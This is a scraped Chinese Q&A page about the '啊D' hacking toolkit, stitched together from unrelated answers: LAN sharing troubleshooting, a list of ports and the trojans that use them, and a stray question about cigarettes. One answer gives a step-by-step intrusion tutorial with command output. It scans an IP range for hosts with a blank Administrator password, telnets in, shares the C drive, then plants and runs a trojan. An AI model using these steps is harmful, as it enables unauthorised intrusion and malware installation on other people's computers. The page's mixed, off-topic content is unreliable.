导航:首页 > 净水问答 > 啊d过滤11

啊d过滤11

发布时间:2022-05-12 01:44:33

1. 在我使用啊D注入的时候,为啥系统提示我所注入的网址不能使用SQL注入

楼主,因为那个网址不能注入啊。请你知道什么叫SQL注入。sql注入漏洞的产生是由于写代码的时候没过滤好所以才产生的。详细的你可以M我

2. 谁给我一个啊D网络工具包详细的使用教程

1. 共享资源查找 [为你查找网上的共享资源!]2. 肉鸡查找 [查找一个网段NT,Win2000密码过于简单的主机,还加入了系统版本识别,使用更方便]3. 远程服务查看 [你可以查看和修改远程的服务,如关闭和启动Telnet,更方便!]4. 查看隐藏共享 [查看远程计算机的全部共享,包括隐藏的共享也可以查看的到,查看共享更方便]5. 查看用户组信息 [Win介面的查看远程机子的用户和组的信息,便用更方便!]6. 开远程的Telnet [直截开启微软自带的Telnet,开Telnet,原来也可以这么简单!]3. NT消息发送 [向NT的机子发送消息,便用Win介面使用更方便!]3. IP端口扫描 [有针对性的查看整个网段的某个端口,如冰河端口7626]4. 端口扫描 [使你更加了解对方主机端口的打开状况]5. 网卡MAC [快速获取一个网段的 用户名、工作组、对方的网卡MAC地址]6. 网络状态查看 [想知道自己机子打开了什么端口吗?本程序可帮上你的忙!]7. 主机查询 [想知道IP的的所在地?想知道某地有哪些IP,本程序可帮上你的忙!]8. Ping [判断某IP是否和网络连接的好帮手!]9. 域名<=>IP [想知道域名对应的IP,想知道IP对应的域名,本程序可以帮助你!]10. 路由查看 [想知道某IP经过的路由?用本程序就可以给你答案!]11. Finger [Finger能为你查询对方系统的用户信息!]12. 进程查看 [查看正在运行的软件,查木马还是有一定的帮助的!]13. 本机IP [在上网的时候,想知道自己的IP吗?本程序可以为你办到!]14. 常用修改 [反恶意网页修改,恢复系统设置等]19. 查错误代号说明 [不知道51这个代号表示什么错误,查一查就知道了!]这里有啊D网络工具包下载,并且教程也有下载! http://www.d99net.net/article.asp?id=3

3. 求最新啊D工具包下载地址

啊D网络工具包 V2.02
http://www.ysye.com/soft/181.html
这个可以下载

4. 如何使用啊D

现在最流行的抓鸡方法就是用啊D工具包抓本地肉鸡,有很多人都说用啊D 工具包扫不到肉鸡,其实扫描的ip也是有技巧的,网上有很多抓135肉鸡的教程,可都讲的比较模糊,尤其扫的ip更是只字不提,这样新手以为随便找段ip就可以了,可是扫了半天什么也没有,都在纳闷,为什么别人可以扫到,我就扫不到?原因就是没找到本地的ip段。。。
首先打开IE在地址栏输入http://www.ip138.com,打开后刷新一下就是你外网的ip,也就是公网ip,例如你的ip是218.76.40.145,那你就在啊D工具的肉鸡查找的ip框里输入218.76.40.1,后面的ip会自动显示为218.76.40.255这个我们不用管,下面点击设置--选猜测administrator只帐号并关闭。
现在大家扫一下看看,是不是可以扫到很多呢。我想应该可以扫到很多。

扫到了以后就要telnet对方的主机了,具体步骤右击IP地址: 222.189.115.242 Administrator (空) WinXP [5.1] 打开对方的telnet 并选择启动很快就可以登陆到对方的主机,输入用户名Administrator 密码为空直接回车就可以了,进入后先开启c盘做共享,命令是net share c$=c:\,例如
*===============================================================
Welcome to Microsoft Telnet Server.
*===============================================================
C:\Documents and Settings\Administrator>net share c$=c:\
c$ 共享成功。

C:\Documents and Settings\Administrator>
共享开启成功就可以种植你的木马了,右击IP地址: 222.189.115.242 Administrator (空) WinXP [5.1]选择木马(IPC$)种植机把木马种植到c盘最后显示无效的句柄,
如:建立 \\222.189.115.211\IPC$ 管道.... OK!
复制文件到对方主机.... OK!
读取对方机子的时间.... 2006-08-20 15:55 OK!
在对方机子添加任务....
错误: 1702 绑定句柄无效。
--------------------------------------------------
我们必须手工运行。。先用dir查看一下如:

C:\ 的目录

2006-01-02 01:55 <DIR> WINDOWS
2006-01-02 02:00 <DIR> Documents and Settings
2006-01-02 02:12 <DIR> Program Files
2006-01-11 02:58 <DIR> Ghost
2006-01-12 02:58 <DIR> boot
2006-05-17 09:42 42,377,996 Rav18_26_12.exe
2006-05-17 09:59 <DIR> RAVBIN
2006-05-17 20:01 <DIR> csc108
2006-06-06 21:41 <DIR> Othello
2006-06-15 19:01 223 cmd.txt
2006-06-15 19:01 4 response.txt
2006-06-14 20:26 34,466 VETlog.dmp
2006-06-14 20:26 1,467 VETlog.txt
2006-06-18 11:20 <DIR> Downloads
2006-06-18 11:51 <DIR> QQFO
2006-07-03 10:24 376 NatTest16477656.txt
2006-07-03 10:24 378 NatTest16478888.txt
2006-08-20 15:55 319,319 2.exe
8 个文件 42,734,229 字节
10 个目录 5,185,863,680 可用字节

C:\>
2006-08-20 15:55 319,319 2.exe这就是我上传的木马,在C:\>后面输入2.exe回车木马就运行了如:
C:\>2.exe

5. 高手:啊D网络工具包怎么使局域网未共享的电脑共享!

Windows操作系统局域网不能互访解决方法

在局域网内安装了Windows XP的电脑不能与安装了Windows 98的电脑互相访问,安装了Windows XP的电脑与安装了Windows XP的电脑也不能互相通信。在工作站访问服务器时,工作站的“网上邻居”中可以看到服务器的名称,但是点击后却无法看到任何共享内容,或者提示找不到网络径、无权访问等问题,归纳为以下几点:
在XP首次使用的时候要在网上邻居的属性里面新建一个网络连接进行网络安装向导。

1、检查计算机之间的物理连接

网卡是网络连接的基本设备,在桌面计算机中,每个网卡后面的指示灯应该是亮的,这表示连接是正常的。如果不亮,请检查集线器或交换机是打开的,而且每个客户端连接的指示灯都是亮的,这表示链接是正常的。接下来检查网线的水晶头是否接触良好。

2、确保所有计算机上都安装了TCP/IP,并且工作正常

在Windows XP中默认安装了TCP/IP。但是,如果出了网络问题想卸载后重新安装TCP/IP就不容易了:在“本地连接”属性中显示的此连接使用下列项目列表中单击Internet协议(TCP/IP)项,您将发现卸载按钮不可用(被禁用)。

这是因为传输控制协议/Internet协议(TCP/IP)堆栈是Microsoft XP/ 2003的核心组件,不能删除。在这种情况下,如果需要重新安装TCP/IP以使TCP/IP堆栈恢复为原始状态。可以使用NetShell实用程序重置TCP/IP堆栈,使其恢复到初次安装操作系统时的状态。方法是:在命令提示符后键入以下命令,然后按ENTER键:netsh int ip reset c:\resetlog.txt,其中,Resetlog.txt记录命令结果的日志文件,一定要指定,这里指定了Resetlog.txt日志文件及完整路径。运行此命令的结果与删除并重新安装TCP/IP协议的效果相同。

3、使用ping命令测试网络中两台计算机之间的连接:

ping其它计算机IP,在命令提示处,键入ping x.x.x.x(其中x.x.x.x是另一台计算机的IP地址),然后按ENTER键。应该可以看到来自另一台计算机的几个答复,如:

Reply from x.x.x.x:bytes=32 time<1ms TTL=128

如果没有看到这些答复,或者看到"Request timed out",说明本地计算机可能有问题。如果ping命令成功执行,那么您就确定了计算机可以正确连接,可以跳过下一步。如果没有看到这些答复,或者看到"Request timed out",说明本地计算机可能有问题。PING本地IP,如果看到"Request timed out",说明本地计算机可能有问题。

4、使用ping命令测试网络中名称解析是否正常

ping computername,其中computername是远程计算机的名称。通过ping命令用名称测试计算机连接。确定计算机的名称的方法是:在命令提示处,输入SYSTEMINFO。或者在桌面上右击我的电脑-属性,然后单击计算机名称选项卡。如果看到该命令的成功答复,说明您在计算机之间具有基本连接和名称解析。名称解析跟NETBIOS密切相关,看下面的步骤。

5、正确安装网络组件

首先右击网上邻居-属性,选择要共享的网卡。把IP设置在局域网的同一个网段上。比如192.168.1.X网段。然后看一下TCP/IP的高级属性中,是否开启NETBIOS。

在利用WINNT4.0构建的网络系统中,对每一台主机的唯一标识信息是它的NetBIOS名,系统是利用WINS服务、信息广播方式及Lmhost文件等多种模式将NetBIOS名解析为相应IP地址,从而实现信息通讯。

在内部网络系统中(也就是通常我们所说的局域网中),利用NetBIOS名实现信息通讯是非常方便、快捷的。但是在Internet上对一台主机的唯一标识信息是它的FQDN格式的域名(163.com),在Internet是利用DNS标准来实现将域名解析为相应IP地址,WIN2K支持动态DNS,运行活动目录服务的机器可动态地更新DNS表。

WIN2K网络中可以不再需要WINS服务,但是WIN2K仍然支持WINS,这是由于向后兼容的原因。目前,大多数网络是混合网,既有Win98等系统,又有WINXP/WIN2K等系统,因此需要在TCP/IP协议上捆绑NETBIOS解析计算机名。

查看是否选定“文件和打印服务”组件,如果已将其取消选中,“浏览服务”将不绑定到NetBIOS接口。成为备份浏览器并且没有启用“文件和打印共享”的基于Windows的计算机无法将浏览列表与客户机共享。任何将要包括在浏览列表中的计算机也都必须启用“文件和打印共享”。

6、启用打印与文件共享

在网上邻居和本地连接属性里可以看到是否安装了打印机与文件共享。验证:如果在网上邻居中看不到自己的机器,说明你没有安装打印机与文件共享。

7、启动"计算机浏览器"服务

计算机浏览器"服务在网络上维护一个计算机更新列表,并将此列表提供给指定为浏览器的计算机。如果停止了此服务,则既不更新也不维护该列表。

WIN2K/XP要确保计算机浏览服务正常启动。打开计算机管理->服务和应用程序->服务,在右窗中确保“Computer Browser”没有被停止或禁用。

8、运行网络标识向导

我的电脑选择“属性”,然后单击“计算机名”选项卡单击“网络 ID”按钮,开始“网络标识向导”:单击“下一步”,选择“本机是商业网络的一部分,用它连接到其他工作着的计算机”;单击“下一步”,选择“公司使用没有域的网络”;单击“下一步”按钮,然后输入你的局域网的工作组名,再次单击“下一步”按钮,最后单击“完成”按钮完成设置。

9、Win2k安装NetBEUI协议

在Win2k中NetBEUI协议是一个高效协议在局域网中使,因此必须安装此协议:

网上邻居->属性->本地连接->属性---->安装------>协议------->NetBEUI Protocol

10、起用Guest(来宾)帐户

Windows XP的Guest帐户允许其他人使用你的电脑,但不允许他们访问特定的文件,也不允许他们安装软件。对Windows XP Home Edition计算机或工作组中的Windows XP Professional计算机的所有网络访问都使用来宾帐户。使用net user guest确保为网络访问设置了来宾帐户,如果该帐户是活动的,命令输出中会出现一行类似下面这样的内容:Account active Yes;如果该帐户不是活动的,请使用下面的命令授予来宾帐户网络访问:

net user guest /active:yes

或者打开控制面板->用户帐户或者在管理工具->计算机管理->本地用户和组中打开Guest帐户

11、允许Guest(来宾)帐号从网络上访问

在运行里输入gpedit.msc,弹出组策略管理器,在‘计算机配置-Windows设置-本地策略-用户权利指派’中,有“拒绝从网络访问这台计算机”策略阻止从网络访问这台计算机,如果其中有GUEST帐号,解决办法是删除拒绝访问中的GUEST帐号。

12、防火墙

确保WINXP自带的防火墙没有开启,打开本地连接属性->高级,关掉Internet连接防火墙。如果使用了第三方的防火墙产品,参考其使用手册,确保防火墙没有禁止以下端口的通讯:UDP-137、UDP-138、TCP-139、TCP-445(仅WIN2K及以后的操作系统)。

Windows XP最新的SP2补丁对ICF做了很大的改进,功能更强大了,ICF有了自己的设置项,安装SP2后,默认情况下,启用ICF防火墙,不允许任何外部主动连接,即使是本地的应用程序要访问网络也需要在许可列表中做设置。

但是防火墙阻断正常的网络浏览服务通讯,结果是别人在网上邻居中看不到你的计算机,有没有两全其美的办法在开启防火墙的前提下允许浏览服务。

办法是,如果开启了ICF,打开属性,在服务这栏,选择添加,添加服务的对话框共有四个编辑框,最上边是描述服务名称,以便于记忆,从上到下第二个是应用服务的IP地址或名称,输入127.0.0.1表示本机。

下面连个是内外端口号,旁边的tcp/udp标示这个端口是udp连接还是tcp连接。

按照下面的表格输入3个服务

名称 协议 端口

NetBIOS Name Service UDP 137

NetBIOS Datagram Service UDP 138

NetBIOS Session Service TCP 139

137/UDP -- NetBIOS名称服务器,网络基本输入/输出系统(NetBIOS)名称服务器(NBNS)协议是TCP/IP上的NetBIOS (NetBT)协议族的一部分,它在基于NetBIOS名称访问的网络上提供主机名和地址映射方法。

138/UDP -- NetBIOS数据报,NetBIOS数据报是TCP/IP上的NetBIOS (NetBT)协议族的一部分,它用于网络登录和浏览。

139/TCP -- NetBIOS会话服务,NetBIOS会话服务是TCP/IP上的NetBIOS (NetBT)协议族的一部分,它用于服务器消息块(SMB)、文件共享和打印。

13、检查RPC、Plug and Play服务已启动,检查相应的系统文件夹的权限,重新注册以下的动态链接库

regsvr32 netshell.dll

regsvr32 netcfgx.dll

regsvr32 netman.dll

14、设置帐号和密码

由于WinNT内核的操作系统,在访问远程计算机的时候,好像总是首先尝试用本地的当前用户名和密码来尝试,可能造成无法访问,在这里把用户密码添加进去就可以了。

15、多种方法访问“网络计算机”

例如要打开网络中名为“Killer”的计算机,其IP地址为192.168.1.8,如果你不清楚其它机器的IP地址,你可以使用“PING计算机名”来获得它的IP地址。

用计算机名访问,NETBIOS提供的服务。点击“开始”菜单,单击“运行”,在地址栏输入“\Killer”,单击“确定”。

用IP地址访问,在地址输入栏中输入“\192.168.1.8”,单击“确定”。

用搜索计算机的方法访问,计算机更新列表需要时间,搜索计算机可以加快更新列表。点击“网上邻居”右键中的“搜索计算机”,输入计算机名,点击“立即搜索”,就可以看到你要访问的计算机。直接双击右边计算机名就可以打开它了。

用映射驱动器的方法访问,进入DOS方式,输入“NET VIEW \killer”,回车�这是查看计算机Killer上有哪些共享文件夹,如D。再输入NET USE Z:\Killer\D�将计算机IBM-ZB共享的文件夹D映射为H:盘,在命令提示符下键入“Z:”。你会发现你已经连到Killer计算机上了。

1、 两台机子都添加NETBIOS协议,
2、两台启用guest帐号
3、文件夹开启共享,
4、开始--运行里面输入\\对方IP 回车。。OK,
还有一种方法可以省去第三步:
开始--运行里面输入\\对方IP\你要访问的盘符$ 回车
举例: \\192.168.1.3\C$
然后会弹出一个“连接到****”的窗口,你输入对方机子的用户名(默认administrator)密码(没设为空)就可以了,用户名密码可以到“我的电脑-属性-管理-本地用户和组”进行管理。
网上邻居十大经典应用技巧
现在人们已经日益习惯使用“网上邻居”进行文件的拖移共享,方便快捷。但是你知道吗,“网上邻居”这么个小组件却有许许多多的使用技巧!今天我们就抱以寓学于玩的目的为大家奉上“网上邻居”精妙玩法TOP10!

10 网上邻居协议巧妙设置技法

有人说为什么他的计算机桌面中没有网上邻居图标呀?其实这是没有正确设置网上邻居协议引起的,要想让网上邻居正常发挥作用,大家必须合理设置一个名叫NetBEUI的网络协议。由于在默认状态下无论是Windows 98操作系统还是Windows 2000操作系统,都不会自动安装这个协议的;要是不安装这个NetBEUI网络协议的话,那么我们日后直接通过网上邻居图标来访问局域网中的其他工作站时,可能会出现各种莫名其妙的错误,例如在打开的网上邻居窗口中可能会发现局域网内的许多工作站都不能被访问到,而且其他人在网上邻居中也看不到你的计算机名字。具体设置的方法为:首先在Windows 2000桌面上找到“网上邻居”图标,然后用鼠标右键单击该图标,从随后打开的右键快捷菜单中执行“属性”命令;接着在“本地连接”上再用鼠标右键单击之,从其后打开的快捷菜单中执行“属性”命令,在属性对话框中单击“安装”按钮;然后选择“协议”,并执行“添加”命令;在出现的协议选择列表框中,大家可以用鼠标选择“NetBEUI”这个协议,再单击“确定”按钮;随后系统可能会弹出一个提示对话框,要求大家在光驱中放入Windows 2000安装盘,最后根据屏幕的安装向导提示来完成协议的安装任务。

实用指数:★★★ 惊奇指数:★ 综合指数:★★☆

9 网上邻居搜索法查询技法

大家知道用鼠标双击Windows系统桌面上的“网上邻居”图标时,就会将连接在网上的计算机找到;要是大家不能在网上邻居的窗口中找到自己需要寻找的计算机名字,而需要寻找的计算机又的确是连接在局域网中时,大家就不能再通过普通的方法来查询网上邻居的工作站了。大家可以尝试使用“搜索计算机”的方法,来找到需要访问的网上邻居中的计算机,具体操作步骤为:用鼠标依次单击Windows系统桌面上的“开始”/“搜索”/“搜索计算机”命令,在随后现的对话框中,输入要寻找的共享计算机名字,再用鼠标单击一下“立即搜索”按钮,要不了多长时间,网上邻居中指定的计算机就会出现在搜索结果页面中了。

实用指数:★★★★ 惊奇指数:★★ 综合指数:★★★

8 网上邻居IP快速访问技法

倘若自己计算机中的网上邻居图标无效的话,大家可以使用IP地址来快速访问网上邻居的共享计算机,这种访问方法通常适用于不知道网上邻居中的共享计算机名字的情况下。比方说,大家要访问的网上邻居共享计算机的IP地址为192.168.0.1时,那么大家可以按照下面的步骤来访问网上邻居中的共享计算机:首先在Windows系统桌面上,执行“开始”菜单,从弹出的列表中选中“运行”命令,接着再在运行对话框中输入“192.168.0.1”,并单击确定按钮就能看到自己需要访问的共享计算机了。

实用指数:★★★★★ 惊奇指数:★★★ 综合指数:★★★★

7 网上邻居使用名字访问技法

在Windows操作系统下,大家可以用被访问的网上邻居中的共享计算机名字作为网络连接命令,来访问指定的共享计算机;比方说,大家想要访问网上邻居中的共享计算机XXX时,可以先用鼠标依次单击“开始”/“运行”命令,在随后弹出的运行对话框中,输入“XXX”,接着直接单击该对话框中的确定按钮,随后大家就能访问到网上邻居中指定计算机上的内容了。

实用指数:★★★★★ 惊奇指数:★★★★ 综合指数:★★★★☆
6 网上邻居垃圾信息清理技法

在Win98系统中,使用局域网的用户在访问网络邻居时,注册表会在HEKY_CURRENT_USER\Network\Recent主键项中记录下一系列命令操作的信息,包含被访问机器的名字、访问过的应用程序及文件名等,如:主键Recent包含一名为\ierl_server\software的子主键项,表示你曾访问过名为ierl_server的服务器中的software文件夹,点击此项后编辑器右窗显示此项的名称及键值。这些内容基本没有用途,可以适当地清理一下。打开注册表编辑器后,按以下顺序依次打开各级主键:HEKY_CURRENT_USER\Network\Recent,然后把主键Recent的子项删除即可。

实用指数:★★★★★ 惊奇指数:★★★★★ 综合指数:★★★★★

5 网上邻居访问速度提升技法

现在使用网上邻居进行信息交流往往是许多局域网用户们的首选,但许多人常常感觉到自己在通过网上邻居图标访问其他共享信息时,速度非常缓慢;其实大家可以通过下面的方法来提升网上邻居访问速度:首先在Windows系统桌面上单击开始菜单中的运行,在打开的运行对话框中输入regedit命令,这样系统就能打开注册表编辑窗口了;在这个窗口中大家可以依次访问HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current ersion/Explorer/RemoteComputer/NameSpace分支,并将对应NameSpace分支下面的子键删除掉,然后关闭注册表、重新启动计算机就可以了。

实用指数:★★★★★★ 惊奇指数:★★★★★★ 综合指数:★★★★★★

4 网上邻居DOS访问技法

要是哪天不幸运,Windows系统突然不能正常启动了,而此时要非常着急通过网络来访问网上邻居中的共享资源时,大家该如何操作呢?利用网上邻居图标来访问肯定是不现实的了,因为在DOS状态下根据就没有什么图标,那么我们到底该如何在DOS状态下访问共享资源呢?其实DOS状态下的NET命令可以帮助大家实现这一愿望,大家只要在DOS命令提示符下输入“NET VIEW XXX”命令(其中XXX表示网上邻居中的共享计算机名字),再直接回车,就能查看共享计算机XXX上的资源文件了;要是大家输入“NET USE F:XXXYYY”命令的话,就可以将网上邻居中共享计算机XXX上的YYY目录映射为本地计算机中的F盘了,以后大家可以直接在命令提示符下键入“F:”,就能对网上邻居中的共享资源进行相关操作了。

实用指数:★★★★★★ 惊奇指数:★★★★★★ 综合指数:★★★★★★☆3 网上邻居指定域快速登录技法

在局域网中,有时为了管理上的方便经常首先建立主域控制器和备份域控制器,在该域中为每位用户设立用户名,并将大量的信息资源存放在该域的成员服务器内。而普通工作站要能正常访问存放在成员服务器中的资料,在启动时就必须首先登录到这个域。为此,大家就必须对工作站机器进行以下设置:首先在Windows桌面的“网上邻居”图标上单击鼠标右键,从随后弹出的快捷菜单中执行“属性”命令;在打开的属性对话框中,大家可以选择“Microsoft网络客户”,接着再用鼠标单击“属性”按钮;在弹出的对话框中,将“登录到Windows NT域”选中,同时在该设置栏的文本框中输入计算机要自动登录的域名,单击单击“确定”按钮并重新启动计算机就可以了。

倘若工作站使用的是Windows 2000操作系统的话,大家可以按照下面的设置步骤来保证计算机能自动登录到指定域上,同时又能对本地计算机具有一切操作权:首先向局域网管理员申请登录到服务器主域所需要的用户名和密码,同时以超级管理员身份登录到本地计算机中;接下来依次执行“程序”/“管理工具”/“计算机管理”命令,在随后打开的窗口中展开“用户和组”,选择“组”;然后在用鼠标右键单击“Administrators”图标,在打开的快捷菜单中选择“添加到组”命令;下面按照屏幕提示,把用户向管理员申请的用户添加到Administrators组中;当选择服务器所使用的域名时,计算机将会要求大家输入访问该域权限的用户名和密码,大家必须正确输入事先申请好的用户名和密码,设置完毕后,重新启动计算机就可以了。

实用指数:★★★★★★ 惊奇指数:★★★★★★★★ 综合指数:★★★★★★★

2 无效共享文件夹删除技法

在网上邻居中传输文件时,我们一般都是先将文件存放在某一文件夹中,然后将文件夹设置为共享,这样就可以直接使用移动、复制的方式来实现文件交流传输的目的;可是,在缺省情况下,文件夹的共享方式即使已经被解除了,我们还能够在“网上邻居”看到共享的文件夹名,不过该文件夹已经无效了。为了将这个无效的共享文件夹删除掉,我们可以按如下步骤来操作:

首先打开运行对话框,在其中输入注册表编辑命令“regedit”,来打开注册表编辑器窗口;执行该界面中的“编辑”菜单项,选中下面的“查找”命令,在随后出现的查找设置窗口中,输入共享文件夹的具体名称,同时选中该窗口中的“主键”复选项,接着执行“查找下一个”命令;过一会儿,注册表编辑器将打开了HKEY_ LOCAL_分支,在对应LanMan键值的右边区域中,我们可以找到共享的文件夹名称;用鼠标右键单击该文件夹名称,从打开的快捷菜单中,执行“删除”命令,最后退出注册表编辑窗口,重新启动一下系统,再次打开网上邻居时,我们就看不到无效的共享文件夹名称了。

当然,还有一种更为简单的删除方法,那就是先在本地计算机中,创建一个空文件夹,并将该文件夹的共享名称设置为与“网上邻居”中无效文件夹相同的名称,,这样屏幕上将打开一个文件夹出现共享冲突的提示,此时我们可以执行提示框中的“是”命令,就能删除无效共享文件夹了!

实用指数:★★★★★★★ 惊奇指数:★★★★★★★★★ 综合指数:★★★★★★★★

1 网上邻居删除技法

有时为了安全,需要将网上邻居图标从系统桌面上删除掉。删除网上邻居最方便的方法是直接在网络设置中将NetBEUI和IPX/SPX协议删除掉,具体操作为:首先打开“控制面板”窗口,在这个窗口中打开“网络”属性对话框,然后在该对话框里将NetBEUI和IPX/SPX两种协议选中,并执行删除命令;接着用鼠标右键单击“拨号网络”图标,从弹出的右键菜单中执行“属性”命令,在其后出现的对话框中选择“服务器类型”,并在其中将NetBEUI和IPX/SPX两项选取消,最后重新启动计算机就可以了。
注:转载

6. .啊D网络工具包

您好!
啊D网络工具包有下列功能:
1. 共享资源查找 [为你查找网上的共享资源!]
2. 肉鸡查找 [查找一个网段NT,Win2000密码过于简单的主机]
3. IP端口扫描 [有针对性的查看整个网段的某个端口,如冰河端口7626]
4. 端口扫描 [使你更加了解对方主机端口的打开状况]
5. 网卡MAC [快速获取一个网段的 用户名、工作组、对方的网卡MAC地址]
6. 网络状态查看 [想知道自己机子打开了什么端口吗?本程序可帮上你的忙!]
7. 主机查询 [想知道IP的的所在地?想知道某地有哪些IP,本程序可帮上你的忙!]
8. Ping [判断某IP是否和网络连接的好帮手!]
9. 域名<=>IP [想知道域名对应的IP,想知道IP对应的域名,本程序可以帮助你!]
10. 路由查看 [想知道某IP经过的路由?用本程序就可以给你答案!]
11. Finger [Finger能为你查询对方系统的用户信息!]
12. 进程查看 [查看正在运行的软件,查木马还是有一定的帮助的!]
13. 本机IP [在上网的时候,想知道自己的IP吗?本程序可以为你办到!]
14. 常用修改 [反恶意网页修改,恢复系统设置等]
15. 查错误代号说明 [不知道51这个代号表示什么错误,查一查就知道了!]

-----------------全心全意为人民服务!---------------
您好,我是互联网网友专家。
如果我的答案对您有帮助,那么我倍感欣慰,您的支持就是我前进的动力!
如果我的答案不够清楚、详细,那么我会继续努力做的更好!

7. 体佛山边度有520同ESSE啊D女人烟买

7-11应该有,而家好多间7-11,我记得东方广场好又多果边有一间,同济广场附近有一间,中医院附近有一间

8. 如何关闭啊D肉机

端口:161
在推荐你看看其他的

端口:0
服务:Reserved
说明:通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描,使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。

端口:1
服务:tcpmux
说明:这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者,默认情况下tcpmux在这种系统中被打开。Irix机器在发布是含有几个默认的无密码的帐户,如:IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。许多管理员在安装后忘记删除这些帐户。因此HACKER在INTERNET上搜索tcpmux并利用这些帐户。

端口:7
服务:Echo
说明:能看到许多人搜索Fraggle放大器时,发送到X.X.X.0和X.X.X.255的信息。

端口:19
服务:Character Generator
说明:这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。同样Fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载。

端口:21
服务:FTP
说明:FTP服务器所开放的端口,用于上传、下载。最常见的攻击者用于寻找打开anonymous的FTP服务器的方法。这些服务器带有可读写的目录。木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所开放的端口。

端口:22
服务:Ssh
说明:PcAnywhere建立的TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点,如果配置成特定的模式,许多使用RSAREF库的版本就会有不少的漏洞存在。

端口:23
服务:Telnet
说明:远程登录,入侵者在搜索远程登录UNIX的服务。大多数情况下扫描这一端口是为了找到机器运行的操作系统。还有使用其他技术,入侵者也会找到密码。木马Tiny Telnet Server就开放这个端口。

端口:25
服务:SMTP
说明:SMTP服务器所开放的端口,用于发送邮件。入侵者寻找SMTP服务器是为了传递他们的SPAM。入侵者的帐户被关闭,他们需要连接到高带宽的E-MAIL服务器上,将简单的信息传递到不同的地址。木马Antigen、Email Password Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都开放这个端口。

端口:31
服务:MSG Authentication
说明:木马Master Paradise、Hackers Paradise开放此端口。

端口:42
服务:WINS Replication
说明:WINS复制

端口:53
服务:Domain Name Server(DNS)
说明:DNS服务器所开放的端口,入侵者可能是试图进行区域传递(TCP),欺骗DNS(UDP)或隐藏其他的通信。因此防火墙常常过滤或记录此端口。

端口:67
服务:Bootstrap Protocol Server
说明:通过DSL和Cable modem的防火墙常会看见大量发送到广播地址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址。HACKER常进入它们,分配一个地址把自己作为局部路由器而发起大量中间人(man-in-middle)攻击。客户端向68端口广播请求配置,服务器向67端口广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。

端口:69
服务:Trival File Transfer
说明:许多服务器与bootp一起提供这项服务,便于从系统下载启动代码。但是它们常常由于错误配置而使入侵者能从系统中窃取任何 文件。它们也可用于系统写入文件。

端口:79
服务:Finger Server
说明:入侵者用于获得用户信息,查询操作系统,探测已知的缓冲区溢出错误,回应从自己机器到其他机器Finger扫描。

端口:80
服务:HTTP
说明:用于网页浏览。木马Executor开放此端口。

端口:99
服务:Metagram Relay
说明:后门程序ncx99开放此端口。

端口:102
服务:Message transfer agent(MTA)-X.400 over TCP/IP
说明:消息传输代理。

端口:109
服务:Post Office Protocol -Version3
说明:POP3服务器开放此端口,用于接收邮件,客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交 换缓冲区溢出的弱点至少有20个,这意味着入侵者可以在真正登陆前进入系统。成功登陆后还有其他缓冲区溢出错误。

端口:110
服务:SUN公司的RPC服务所有端口
说明:常见RPC服务有rpc.mountd、NFS、rpc.statd、rpc.csmd、rpc.ttybd、amd等

端口:113
服务:Authentication Service
说明:这是一个许多计算机上运行的协议,用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多计算机的信息。但是它可作为许多服务的记录器,尤其是FTP、POP、IMAP、SMTP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务,将会看到许多这个端口的连接请求。记住,如果阻断这个端口客户端会感觉到在防火墙另一边与E-MAIL服务器的缓慢连接。许多防火墙支持TCP连接的阻断过程中发回RST。这将会停止缓慢的连接。

端口:119
服务:Network News Transfer Protocol
说明:NEWS新闻组传输协议,承载USENET通信。这个端口的连接通常是人们在寻找USENET服务器。多数ISP限制,只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子,访问被限制的新闻组服务器,匿名发帖或发送SPAM。

端口:135
服务:Location Service
说明:Microsoft在这个端口运行DCE RPC end-point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和RPC的服务利用计算机上的end-point mapper注册它们的位置。远端客户连接到计算机时,它们查找end-point mapper找到服务的位置。HACKER扫描计算机的这个端口是为了找到这个计算机上运行Exchange Server吗?什么版本?还有些DOS攻击直接针对这个端口。

端口:137、138、139
服务:NETBIOS Name Service
说明:其中137、138是UDP端口,当通过网上邻居传输文件时用这个端口。而139端口:通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于windows文件和打印机共享和SAMBA。还有WINS Regisrtation也用它。

端口:143
服务:Interim Mail Access Protocol v2
说明:和POP3的安全问题一样,许多IMAP服务器存在有缓冲区溢出漏洞。记住:一种LINUX蠕虫(admv0rm)会通过这个端口繁殖,因此许多这个端口的扫描来自不知情的已经被感染的用户。当REDHAT在他们的LINUX发布版本中默认允许IMAP后,这些漏洞变的很流行。这一端口还被用于IMAP2,但并不流行。

端口:161
服务:SNMP
说明:SNMP允许远程管理设备。所有配置和运行信息的储存在数据库中,通过SNMP可获得这些信息。许多管理员的错误配置将被暴露在Internet。Cackers将试图使用默认的密码public、private访问系统。他们可能会试验所有可能的组合。SNMP包可能会被错误的指向用户的网络。

端口:177
服务:X Display Manager Control Protocol
说明:许多入侵者通过它访问X-windows操作台,它同时需要打开6000端口。

端口:389
服务:LDAP、ILS
说明:轻型目录访问协议和NetMeeting Internet Locator Server共用这一端口。

端口:443
服务:Https
说明:网页浏览端口,能提供加密和通过安全端口传输的另一种HTTP。

端口:456
服务:[NULL]
说明:木马HACKERS PARADISE开放此端口。

端口:513
服务:Login,remote login
说明:是从使用cable modem或DSL登陆到子网中的UNIX计算机发出的广播。这些人为入侵者进入他们的系统提供了信息。

端口:544
服务:[NULL]
说明:kerberos kshell

端口:548
